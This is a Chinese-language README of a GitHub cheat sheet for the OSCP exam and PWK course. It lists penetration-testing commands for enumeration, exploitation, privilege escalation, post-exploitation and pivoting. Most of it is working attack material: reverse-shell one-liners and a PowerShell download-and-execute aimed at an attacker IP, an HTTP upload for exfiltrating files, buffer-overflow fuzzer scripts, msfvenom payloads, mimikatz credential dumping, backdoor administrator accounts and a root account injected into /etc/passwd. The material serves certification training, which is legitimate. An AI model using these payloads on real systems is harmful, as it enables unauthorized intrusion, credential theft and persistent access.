sinfulz/JustTryHarder

GitHub: sinfulz/JustTryHarder

一份专为 PWK 课程与 OSCP 考试设计的渗透测试全流程命令速查表,涵盖枚举、漏洞利用与权限提升等核心环节。

Stars: 832 | Forks: 105

# JustTryHarder 一份助您完成 PWK 课程及 OSCP 考试的速查表。 *(灵感来源于 [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings))* ## 目录 - [枚举](#enumeration) - [通过 Ping 判断操作系统](#determining-os-via-ping) - [端口扫描](#port-scanning) - [Ping 扫描](#ping-sweep) - [DNS 区域传送](#dns-zone-transfers) - [SMB 枚举](#smb-enumeration) - [SMTP 枚举](#smtp-enumeration) - [SNMP 枚举](#snmp-enumeration) - [Web 扫描](#web-scanning) - [显示监听端口](#show-listening-ports) - [其他枚举资源](#random-enumeration-resources) - [漏洞利用](#exploitation) - [缓冲区溢出 (BOF)](#buffer-overflow-bof) - [LFI / RFI](#lfi--rfi) - [SQL 注入](#sql-injection) - [XSS (跨站脚本攻击)](#xss-cross-site-scripting) - [Kerberoasting](#kerberoasting) - [ICMP 注入](#icmp-injection) - [Responder / NTLM 中继](#responder--ntlm-relay) - [钓鱼 / 绕过 2FA](#phishing--2fa-bypass) - [WordPress](#wordpress) - [Shell 与 Payload](#shells--payloads) - [反弹 Shell](#reverse-shells) - [Web Shell](#web-shells) - [Shell 升级](#shell-upgrading) - [Payload 生成 (msfvenom)](#payload-generation-msfvenom) - [生成 Windows Shell 二进制文件](#spawning-a-windows-shell-binary) - [文件传输](#file-transfers) - [SMB 传输](#smb-transfer) - [Wget 传输](#wget-transfer) - [TFTP 传输](#tftp-transfer) - [NetCat 传输](#netcat-transfer) - [PowerShell 下载](#powershell-download) - [Base64 传输](#base64-transfer-linux-to-linux) - [Certutil](#certutil) - [HTTP 文件上传 (数据外发)](#http-file-upload-exfiltration) - [文件传输资源](#file-transfer-resources) - [密码破解](#password-cracking) - [Hashcat](#hashcat) - [John The Ripper](#john-the-ripper) - [密码喷射 (CrackMapExec)](#password-spraying-crackmapexec) - [密码破解资源](#password-cracking-resources) - [权限提升](#privilege-escalation) - [Linux 权限提升](#linux-privilege-escalation) - [Windows 权限提升](#windows-privilege-escalation) - [内核漏洞利用](#kernel-exploits) - [后渗透](#post-exploitation) - [Mimikatz](#mimikatz) - [Windows 后渗透命令](#windows-post-exploitation-commands) - [Windows 权限维持](#windows-persistence) - [使用 Impacket 进行 SMB 交互](#smb-with-impacket) - [Windows XP 上的 Whoami](#whoami-on-windows-xp) - [隧道代理与端口转发](#pivoting--port-forwarding) - [端口转发概念](#port-forwarding-concepts) - [Chisel](#chisel) - [SSH 端口转发与隧道代理](#ssh-port-forwarding--pivoting) - [SOCKS 代理 (PowerShell)](#socks-proxy-powershell) - [sshuttle](#sshuttle) - [远程桌面](#remote-desktop) - [实用参考资料](#useful-references) - [Web 服务器 (快速设置)](#web-servers-quick-setup) - [突破限制 / 逃逸环境](#breakouts--environment-escapes) - [可写目录](#writeable-directories) - [Metasploit 技巧](#metasploit-tips) - [Nmap 自动化脚本](#nmap-automation-script) - [实验室与练习](#labs--practice) - [Windows 框架 / PowerShell](#windows-framework--powershell) - [致谢](#thank-you) ## 枚举 ### 通过 Ping 判断操作系统 ``` ping 10.10.10.110 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms ``` `TTL` 值会揭示目标操作系统(通过减去最接近的基准值来计算跳数): | TTL 基准 | 操作系统 | 示例 | |---|---|---| | **64** | Linux / \*nix | TTL=61 表示 3 跳 | | **128** | Windows | TTL=127 表示 1 跳 | | **254** | Solaris / AIX | TTL=250 表示 4 跳 | ### 端口扫描 #### TCP ``` nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10 nmap -sT -p 22,80,110 -A 10.10.10.10 reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames nc -v -n -z -w1 10.10.10.10 1-10000 ``` #### UDP UDP 扫描可能需要数小时;如果你已经获取了 shell,使用 `netstat` 是更好的替代方案。 ``` nmap -sU --top-ports 10000 10.10.10.10 nmap -sT -sU -p 22,80,110 -A 10.10.10.10 nmap -sT -sU -p- --min-rate 2000 10.10.10.10 ``` #### 针对特定协议的扫描 ``` # SNMP nmap -p161 -sU 10.10.10.10 # SSH algorithms nmap --script ssh2-enum-algos 10.10.10.10 # SSL/TLS nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 10.10.10.10 ``` #### Nmap Bootstrap HTML 报告 ``` nmap -oA output --stylesheet nmap-bootstrap.xsl 10.10.10.10 firefox nmap-bootstrap.xsl ``` ### Ping 扫描 #### Linux (单行命令) ``` for i in {1..254}; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done fping -g 192.168.0.1/24 ``` #### Linux (脚本) ``` for i in $(seq 1 255); do ping -c1 192.168.125.$i 2>/dev/null 1>&2 if [[ $? -eq 0 ]]; then echo "192.168.125.$i is up" fi done ``` #### Windows (CMD) ``` for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up. ``` #### Windows (PowerShell) ``` $ping = New-Object System.Net.Networkinformation.Ping 1..254 | % { $ping.send("10.9.15.$_", 1) | where status -ne 'TimedOut' | select Address | fl * } ``` #### Nmap ``` nmap -sP 192.168.0.1-254 ``` ### DNS 区域传送 ``` host -t axfr domain.local 10.10.10.10 host -l domain.local 10.10.10.10 dig @10.10.10.10 domain.local axfr ``` ### SMB 枚举 ``` smbmap -H 10.10.10.10 smbclient -L 10.10.10.10 smbclient //10.10.10.10/share$ ``` - [0xdf - SMB 枚举清单](https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html) ### SMTP 枚举 - [SMTP 命令参考](https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt) ### SNMP 枚举 ``` nmap -p161 -sU -iL ips.txt snmpwalk -c public -v1 10.10.10.10 onesixtyone -c community.txt -i ips.txt ``` ### Web 扫描 #### GoBuster ``` # Linux/Apache gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \ -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401 # Windows/IIS gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \ -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401 # HTTPS gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69 ``` #### Dirsearch ``` # Linux/Apache python3 dirsearch.py -r -u http://10.10.10.10/ \ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50 # Windows/IIS python3 dirsearch.py -r -u http://10.10.10.10/ \ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50 ``` #### Nikto ``` nikto -h 10.10.10.10 -p 80 # HTTP nikto -h 10.10.10.10 -p 443 # HTTPS ``` #### WFuzz ``` wfuzz -u http://10.10.10.10/page.php?dir=../../../../../../../../../FUZZ%00 \ -w /usr/share/wfuzz/wordlist/general/common.txt ``` ### 显示监听端口 ``` # Linux netstat -tulpn | grep LISTEN # FreeBSD / macOS netstat -anp tcp | grep LISTEN netstat -anp udp | grep LISTEN # OpenBSD netstat -na -f inet | grep LISTEN # Nmap (本地) sudo nmap -sT -O localhost # TCP sudo nmap -sU -O 192.168.2.13 # UDP ``` ### 其他枚举资源 - [0daysecurity - 枚举](http://0daysecurity.com/penetration-testing/enumeration.html) - [Jok3rSecurity 速查表](https://jok3rsecurity.com/cheat-sheet/) - [ADSecurity](https://adsecurity.org/) ## 漏洞利用 ### 缓冲区溢出 (BOF) 常见的坏字符:`0x00`, `0x0A`, `0x0D` **常规步骤:** 1. Fuzzing(模糊测试) - 发送不断增大的缓冲区以找到崩溃点 2. 寻找 EIP 偏移量 - 使用 `pattern_create` / `pattern_offset` 3. 控制 EIP - 在偏移位置使用字符 `B` 进行验证 4. 查找坏字符 - 发送从 `\x01` 到 `\xFF` 的所有字节,并检查是否有字符被篡改 5. 定位 `jmp esp` - 使用 `!mona jmp -r esp` 寻找一个可靠的返回地址 6. 使用 `msfvenom` 生成 payload(排除坏字符) 7. 获取反弹 shell #### Fuzzer 脚本 ``` #!/usr/bin/python import time, struct, sys import socket as so buff = ["A"] max_buffer = 4000 counter = 100 increment = 100 while len(buff) <= max_buffer: buff.append("A" * counter) counter = counter + increment for string in buff: try: server = str(sys.argv[1]) port = int(sys.argv[2]) except IndexError: print("[+] Usage: python %s " % sys.argv[0]) sys.exit() print("[+] Attempting to crash at %s bytes" % len(string)) s = so.socket(so.AF_INET, so.SOCK_STREAM) try: s.connect((server, port)) s.send((string + '\r\n').encode()) s.close() except: print("[+] Connection failed. Check IP/port or debugger.") sys.exit() ``` #### EIP 偏移量验证 使用 `msf-pattern_create -l ` 生成模式,发送该模式,然后使用 `msf-pattern_offset -q ` 查找偏移量。 ``` #!/usr/bin/python import sys import socket as so # 替换为以下模式的输出: msf-pattern_create -l 500 pattern = "Aa0Aa1Aa2Aa3..." try: server = str(sys.argv[1]) port = int(sys.argv[2]) except IndexError: print("[+] Usage: python %s " % sys.argv[0]) sys.exit() s = so.socket(so.AF_INET, so.SOCK_STREAM) s.connect((server, port)) s.send((pattern + '\r\n').encode()) s.close() ``` #### 偏移量控制验证 一旦知道了偏移量(例如 251),即可验证 EIP 控制: ``` buffer = "A" * 251 + "B" * 4 + "C" * 90 ``` 如果 EIP = `42424242` (BBBB),说明你已控制它。 **BOF 资源:** - [NCC Group - 编写 Win32 漏洞利用](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/) - [Corelan - 漏洞利用编写教程第 1 部分](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - [dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood) - [VeteranSec - 简单搞定 32 位 Windows BOF](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/) - [LiveOverflow - 二进制漏洞利用](https://liveoverflow.com/) - [0xRick - 二进制漏洞利用](https://0xrick.github.io/binary-exploitation/bof5/) - [Exploit Education](https://exploit.education/) - Protostar (32位) 和 Phoenix (64位) *BOF POC 脚本的全部功劳归属于:[jessekurrus/brainpan](https://github.com/jessekurrus/brainpan)* ### LFI / RFI #### 用于 LFI/RFI 的 PHP Shell ``` ``` #### 通过 LFI 实现的 PHP 反弹 Shell ``` & /dev/tcp/10.10.10.10/1234 0>&1'"); ?> ``` **LFI/RFI 资源:** - [FuzzDB LFI Payloads](https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI) - [Total OSCP Guide - LFI](https://sushant747.gitbooks.io/total-oscp-guide/local_file_inclusion.html) - [HighOn.Coffee - LFI 速查表](https://highon.coffee/blog/lfi-cheat-sheet/#procselffd-lfi-method) - [FuzzySecurity LFI 脚本](http://www.fuzzysecurity.com/scripts/16.html) ### SQL 注入 #### MSSQL xp_cmdshell ``` EXEC master..xp_cmdshell 'whoami'; ' exec master..xp_cmdshell 'whoami' -- ``` #### SQLmap ``` sqlmap -u "http://example.com/test.php?test=test" --level=5 --risk=3 --batch ``` **SQL 注入资源:** - [OSCP-2 SQL 注入速查表](https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md) - [PentestMonkey SQLi 速查表](http://pentestmonkey.net/category/cheat-sheet/sql-injection) ### XSS (跨站脚本攻击) #### 基础 Payload ``` ``` #### 基于 DOM 的 XSS (input 标签) ``` " autofocus onfocus="alert(3) ``` #### href 属性中的 XSS ``` javascript:alert(document.cookie) ``` #### 基于 SVG 的 XSS ``` ``` #### 绕过 XSS 过滤器 - [JSFuck](http://www.jsfuck.com/) - 仅使用 `[]()!+` 字符编码 JS payload - [PortSwigger XSS 速查表](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - 生成自定义 payload ### Kerberoasting ``` # Impacket GetUserSPNs.py -request -dc-ip # PowerShell (Invoke-Kerberoast) powershell.exe -NoP -NonI -Exec Bypass IEX \ (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); \ Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat # 导出 NTLM hashes impacket-secretsdump -just-dc-ntlm /@ -outputfile hashes.txt ``` ### ICMP 注入 ``` # 在目标机器上 ping -n 3 10.10.10.10 # 在攻击者机器上 (验证) tcpdump -i tun0 icmp ``` ### Responder / NTLM 中继 ``` responder -I tun0 -wrF ``` - [结合 NTLM 中继和 Empire 的 Responder](https://chryzsh.gitbooks.io/darthsidious/content/execution/responder-with-ntlm-relay-and-empire.html) - [NTLM 中继实战指南](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) ### 钓鱼 / 绕过 2FA - [Modlishka](https://github.com/drk1wi/Modlishka) - 用于钓鱼并绕过 2FA 的反向代理 - [Evilginx2](https://github.com/kgretzky/evilginx2) - 用于钓鱼的中间人攻击框架 - [Modlishka 绕过 2FA 指南](https://medium.com/@kalilinux.in/modlishka-advanced-phishing-bypass-two-factor-authentication-234803791a2a) ### WordPress - [WPScan](https://github.com/wpscanteam/wpscan) - WordPress 漏洞扫描器 - `wpscan --url http://10.10.10.10 --enumerate u,vp,vt` - [Top Hat Sec - WordPress 渗透测试](https://forum.top-hat-sec.com/index.php?topic=5758.0) ## Shell 与 Payload ### 反弹 Shell #### Linux ``` # Bash bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 # Perl perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' # Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' # PHP php -r '$sock=fsockopen("10.10.10.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");' # Netcat nc -e /bin/sh 10.10.10.10 4444 # Netcat (如果 -e 参数不可用,使用命名管道) rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.10 4444 >/tmp/f ``` **资源:** - [PentestMonkey - 反弹 Shell 速查表](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) - [RevShells.com](https://www.revshells.com/) - 在线反弹 Shell 生成器 #### Windows ``` nc 10.10.10.10 4444 -e cmd.exe ``` - [Windows PHP 反弹 Shell](https://github.com/Dhayalanb/windows-php-reverse-shell) ### Web Shell - [PHPBash](https://github.com/Arrexel/phpbash) - [p0wny-shell](https://github.com/flozz/p0wny-shell) ### Shell 升级 #### Python TTY 升级 ``` # 1. 生成一个 PTY python -c 'import pty; pty.spawn("/bin/bash")' # (或 python3) # 2. 将 shell 放入后台 # 按下 Ctrl-Z # 3. 在你的本地终端上 stty raw -echo fg # 4. 回到 reverse shell 中 reset export SHELL=bash export TERM=xterm-256color stty rows columns ``` #### Socat 完整 TTY **监听端:** ``` socat file:$(tty),raw,echo=0 tcp-listen:4444 ``` **受害机:** ``` socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4444 ``` #### 其他快速 Shell 逃逸 ``` perl -e 'exec "/bin/sh";' /bin/sh -i ``` ### Payload 生成 (msfvenom) #### 列出所有 Payload ``` msfvenom -l payloads ``` #### 二进制 Payload ``` # Linux ELF msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf # Windows EXE msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe ``` #### Web Payload ``` # PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php # ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp # JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp # WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war ``` #### 脚本 Payload ``` # Python msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py # Bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh # Perl msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl ``` #### Shellcode ``` # 查看所有输出格式 msfvenom --help-formats # Linux shellcode msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f # Windows shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f ``` #### Metasploit Handler ``` use exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z ``` 快速启动:`msfconsole -L -r handler.rc` **Payload 类型:** | 类型 | 描述 | 示例 | |---|---|---| | **Non-staged (非分阶段)** | 一次性发送完整 payload | `shell_reverse_tcp` (配合 `netcat` 使用) | | **Staged (分阶段)** | 分部分传输 payload | `shell/reverse_tcp` (需要 `multi/handler`) | **资源:** - [NETSEC - 创建 Payload](https://netsec.ws/?p=331) - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) - [ShellPop](https://github.com/0x00-0x00/ShellPop) ### 生成 Windows Shell 二进制文件 编译一个简单的二进制文件来启动 `cmd.exe`(对于通过可写的服务路径等进行权限提升非常有用): ``` #include int main() { system("C:\\Windows\\System32\\cmd.exe"); } ``` 在 Linux 上使用 MinGW 进行交叉编译: ``` apt install mingw-w64 x86_64-w64-mingw32-gcc pwn.c -o pwn.exe ``` ## 文件传输 ### SMB 传输 在受害机器 上: ``` net use x: \\10.10.10.10\myshare copy whatever.zip x: ``` ### Wget 传输 将文件放在 `/var/www/html/` 中并启动 Apache: ``` service apache2 start ``` 在远程服务器上: ``` wget http://10.10.10.10/file.bin # Single file wget -r http://10.10.10.10/directory/ # Entire directory ``` ### TFTP 传输 通过 Metasploit 从 Kali传输到 Windows: ``` use auxiliary/server/tftp set TFTPROOT /usr/share/mimikatz/Win32/ run ``` 在 Windows 目标机上: ``` tftp -i 10.10.10.10 GET mimikatz.exe ``` ### NetCat 传输 ``` # 发送端 (Windows) nc -nv 10.10.10.10 4444 < file.zip # 接收端 (Linux) nc -nlvp 4444 > file.zip ``` ### PowerShell 下载 交互式会话: ``` Invoke-WebRequest -Uri http://10.10.10.10/exploit.py -OutFile C:\Users\Victim\exploit.py ``` 非交互式 (创建 `wget.ps1`): ``` $client = New-Object System.Net.WebClient $url = "http://10.10.10.10/file.txt" $path = "C:\path\to\save\file.txt" $client.DownloadFile($url, $path) ``` ### Base64 传输 (Linux 到 Linux) 在本地主机上: ``` cat /path/to/exploit.py | base64 > encoded.b64 ``` 将 `encoded.b64` 传输到远程服务器,然后进行解码: ``` cat encoded.b64 | base64 -d > exploit.py ``` ### Certutil ``` certutil.exe -urlcache -split -f "http://10.10.10.10/file.zip" file.zip ``` ### HTTP 文件上传 (数据外发) **1. 在你的攻击者 Web 根目录 (`/var/www/html/`) 创建 `upload.php`**: ``` ``` **2. 创建上传目录:** ``` sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads ``` **3. 从受害机上传:** ``` powershell.exe -exec unrestricted -noprofile -Command \ "(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')" ``` ### 文件传输资源 - [Nakkaya - NetCat 文件传输](https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/) - [isroot.nl - Windows 上的后渗透文件传输](https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/) - [ropnop - 从 Kali 向 Windows 传输文件](https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb) - [0xdf - Windows 文件传输](https://0xdf.gitlab.io/2018/10/11/pwk-notes-post-exploitation-windows-file-transfers.html) - [JollyFrogs - 向 Windows 传输文件](https://www.jollyfrogs.com/transfer-files-windows/) ## 密码破解 ### Hashcat ``` hashcat -m 500 -a 0 -o cracked.txt --force hash.txt /path/to/wordlist.txt ``` - [Hashcat 示例哈希](https://hashcat.net/wiki/doku.php?id=example_hashes) - 查找你的哈希类型对应的 `-m` 模式编号 ### John The Ripper ``` john --rules --wordlist=/path/to/wordlist.txt hash.txt ``` - [使用 John the Ripper 破解一切](https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c) ### 密码喷射 (CrackMapExec) ``` cme smb 10.10.10.10 -u username -d domain -p password ``` 本仓库中包含了一个小型的季节/月份字典文件 (`wordlists/English-dates.txt`),可用于喷射诸如 `Spring2021`、`Summer2020` 等常见模式。 ### 密码破解资源 - [Hashcat 示例哈希](https://hashcat.net/wiki/doku.php?id=example_hashes) - [Hashcat NTLM 暴力破解](https://cyberloginit.com/2017/12/26/hashcat-ntlm-brute-force.html) - [HashID - 识别哈希类型](http://mattw.io/hashID/types) - [HashKiller](https://hashkiller.co.uk/Cracker) - [CrackStation](https://crackstation.net) - [Hydra Web 认证字典攻击](https://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html) - [naive-hashcat](https://github.com/brannondorsey/naive-hashcat) ## 权限提升 ### Linux 权限提升 #### 枚举命令 ``` grep -Ri 'password' . find / -perm -4000 2>/dev/null find / -perm -u=s 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null ``` #### 通过 /etc/passwd 进行权限提升 如果你对 `/etc/passwd` 有写权限: ``` # 生成密码 hash openssl passwd mrcake # 输出: WVLY0mgH0RtUI # 添加一个 root 级别的用户 echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd # 切换到新用户 su root2 # 密码: mrcake ``` #### 自定义 SUID 二进制文件 需要以目标用户身份执行代码(例如,通过以 root 身份运行的 MySQL `sys_eval`): ``` #include #include #include int main() { setuid(geteuid()); system("/bin/bash"); return 0; } ``` #### NFS 权限提升 如果 NFS 共享被错误配置且带有 `no_root_squash` 参数,你可以挂载该共享并创建 SUID 二进制文件。 - [NFS 权限提升](https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/) - [LD_PRELOAD 权限提升](https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/) #### Linux 权限提升工具与资源 - [GTFOBins](https://gtfobins.github.io) - 突破受限 shell / 滥用 SUID 二进制文件 - 辅助脚本:[gtfo](https://github.com/dreadnaughtsec/gtfo) - [LinEnum](https://github.com/rebootuser/LinEnum) - [linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester) - [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2) - [pspy](https://github.com/DominicBreuker/pspy) - 无需 root 权限监控进程 - [unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) - [linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker) - [g0tmi1k - 基本 Linux 权限提升](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [通过 sudo 进行 Linux 权限提升](http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/) ### Windows 权限提升 #### 快速胜利 ``` churrasco -d "net user /add " churrasco -d "net localgroup administrators /add" churrasco -d "NET LOCALGROUP \"Remote Desktop Users\" /ADD" ``` #### 检查存储的凭据 ``` cmdkey /list runas /user:DOMAIN\Administrator /savecred "cmd.exe" ``` #### 清单 1. 检查是否安装了 PowerShell (`C:\Windows\System32\WindowsPowerShell`) 2. 运行 PowerUp 或其他枚举脚本 3. 检查内核漏洞(使用 Windows Exploit Suggester) 4. 检查 Program Files 中是否存在过时 / 易受攻击的软件 5. 检查 `cmdkey /list` 以获取存储的凭据 #### Windows 权限提升工具与资源 - [FuzzySecurity - Windows 权限提升基础](http://www.fuzzysecurity.com/tutorials/16.html) - [absolomb - Windows 权限提升指南](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) - [PowerUp / PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) - [Powerless](https://github.com/M4ximuss/Powerless) - Windows 枚举(无需 PowerShell) - [JAWS](https://github.com/411Hall/JAWS) - Just Another Windows Enum (又一个 Windows 枚举脚本) - [Watson](https://github.com/rasta-mouse/Watson) - 基于 .NET 的补丁枚举 - [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - [本地权限提升研讨会](https://github.com/sagishahar/lpeworkshop) - [存储凭据利用](https://pentestlab.blog/2017/04/19/stored-credentials/) ### 内核漏洞利用 - [Linux 内核漏洞利用](https://github.com/SecWiki/linux-kernel-exploits) - [lucyoa - 内核漏洞利用合集](https://github.com/lucyoa/kernel-exploits) - [DirtyCow (Linux)](https://github.com/FireFart/dirtycow) - [RottenPotatoNG (Windows)](https://github.com/breenmachine/RottenPotatoNG) ## 后渗透 ### Mimikatz ``` mimikatz.exe privilege::debug sekurlsa::logonpasswords ``` ### Windows 后渗透命令 ``` WMIC USERACCOUNT LIST BRIEF net user net localgroup Users net localgroup Administrators net user USERNAME NEWPASS /add net user "USER NAME" NEWPASS /add net localgroup administrators USERNAME /add ``` ### Windows 权限维持 ``` # 添加新用户 net user /add hacker 1234567 # 添加到 Administrators net localgroup administrators /add hacker # 添加到 Remote Desktop Users net localgroup "Remote Desktop users" hacker /add # 启动 Remote Desktop 服务 net start TermService # 检查 TermService 是否正在运行 tasklist /svc | findstr /C:TermService # 永久启用 Terminal Services sc config TermService start=auto # 通过注册表启用 (需要重启) reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ``` - [SharPersist](https://github.com/fireeye/SharPersist) - C# 权限维持工具包 - Metasploit:`use exploit/windows/local/registry_persistence` *鸣谢:[s0wr0b1ndef OSCP 笔记](https://github.com/s0wr0b1ndef/OSCP-note/blob/master/persistence/persistence_windows.txt)* ### 使用 Impacket 进行 SMB 交互 #### PSEXEC (远程 Shell) ``` /usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10 ``` #### SMB 服务器 (文件传输) ``` cd /usr/share/windows-binaries python /usr/share/doc/python-impacket/examples/smbserver.py share . ``` 在目标机上: ``` \\10.10.10.10\share\mimikatz.exe ``` ### Windows XP 上的 Whoami Windows XP 缺少内置的 `whoami` 命令。请使用 Kali 中的版本: ``` # 在 Kali 上 - 启动 SMB server smbserver.py share /usr/share/windows-binaries/ ``` ``` # 在 XP 目标上 \\10.10.14.14\share\whoami.exe # 输出: NT AUTHORITY\SYSTEM ``` 如果 `%username%` 没有展开,你很可能正在以 SYSTEM 身份运行: ``` echo %username% # 如果这直接输出 "%username%" 字面量,说明你是 SYSTEM ``` *鸣谢:[0xdf - HTB Legacy](https://0xdf.gitlab.io/2019/02/21/htb-legacy.html)* ## 隧道代理与端口转发 ### 端口转发概念 | 类型 | 方向 | 使用场景 | |---|---|---| | **本地** | 将本地端口转发到远程 | 在本地访问远程服务 | | **远程** | 将远程端口转发到本地 | 将本地服务暴露给远程机器 | | **动态** | SOCKS 代理 | 通过隧道路由任意流量 | ### Chisel **在你的机器上 (服务器端):** ``` ./chisel server -p 8080 --reverse ``` **在受害机上:** ``` ./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234 ``` ### SSH 端口转发与隧道代理 **1. 在跳板机上生成 SSH 密钥对**: ``` ssh-keygen cat ~/.ssh/id_rsa.pub ``` **2. 将公钥添加**到你的 Kali 机器上的 `~/.ssh/authorized_keys` 中,并附带限制条件: ``` from="[VICTIM_IP]",command="echo 'Port forwarding only'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY] ``` **3. 在 Kali 上启动 SSH**: ``` sudo service ssh start ``` **4. 从跳板机创建隧道**: ``` ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" \ -i /path/to/id_rsa kali@KALI_IP ``` **5. 配置 proxychains** (`/etc/proxychains.conf`): ``` socks4 127.0.0.1 1080 ``` **6. 使用 proxychains**(使用 nmap 时仅限 TCP Connect 扫描): ``` sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10 ``` **快速 SSH 隧道:** ``` # 远程端口转发 ssh user@10.10.10.10 -R 1234:127.0.0.1:1234 # 动态 SOCKS 代理 ssh -D 1337 -q -C -N -f user@10.10.10.10 ``` ### SOCKS 代理 (PowerShell) ``` # 1. 配置 proxychains # vi /etc/proxychains.conf -> socks5 9080 # 2. 导入并启动代理 Import-Module .\Invoke-SocksProxy.psm1 Invoke-SocksProxy -bindPort 9080 # 3. 使用它 # proxychains nmap -sT ``` ### sshuttle ``` sshuttle -r user@10.10.10.10 10.1.1.0/24 ``` ### 远程桌面 ``` rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/ xfreerdp /d:domain.local /u:username /p:password /v:10.10.10.10 /cert-ignore ``` ## 实用参考资料 ### Web 服务器 (快速设置) ``` python -m SimpleHTTPServer 80 # Python 2 python3 -m http.server 80 # Python 3 php -S 0.0.0.0:80 # PHP ngrok http 80 # ngrok ``` ### 突破限制 / 逃逸环境 - [Pentest Partners - 突破 Citrix 